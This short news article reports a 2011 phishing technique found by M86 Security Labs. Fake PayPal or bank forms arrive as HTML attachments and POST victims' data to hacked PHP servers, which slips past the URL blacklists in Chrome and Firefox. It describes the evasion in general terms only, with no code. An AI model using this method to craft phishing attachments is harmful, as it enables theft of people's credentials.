Google Chrome and Mozilla Firefox come with a security feature that allows the browsers to receive blacklisted URLs of known phishing sites. These browsers won’t go to those sites unless the users specifically enable them to.
But a new phishing fraud is targeting bank and PayPal passwords and other private data of online users through a design that beats the security features of both Chrome and Firefox. M86 Security Labs discovered this technique of bypassing the blacklist-based protection.
This new technique uses the suitable old POST parameter in the HTML language. The users are no more required to visit phony sites and fill out similar-looking forms as in PayPal or online banking.
The users would receive the form as an HTML attachment. When the unsuspecting users fill out the form and click on the submit button for the attached document, the data on the record is sent out to the hacked PHP servers through the POST request. The thing to notice is that even though the actual URL where the data was being sent through the POST command is a phishing URL, Chrome and Firefox wouldn’t be able to detect such activity at all.
Chrome and Firefox are not picking up on this activity because not many hacked PHP servers end up on those black lists. Beyond this, as the PHP code doesn’t show up on the client’s browser, there is not much that can be done to detect any phishing activity.
The users also play their part by not being informed of such activities, and regular users aren’t that sophisticated to pick up on such activities. More information can be found on http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/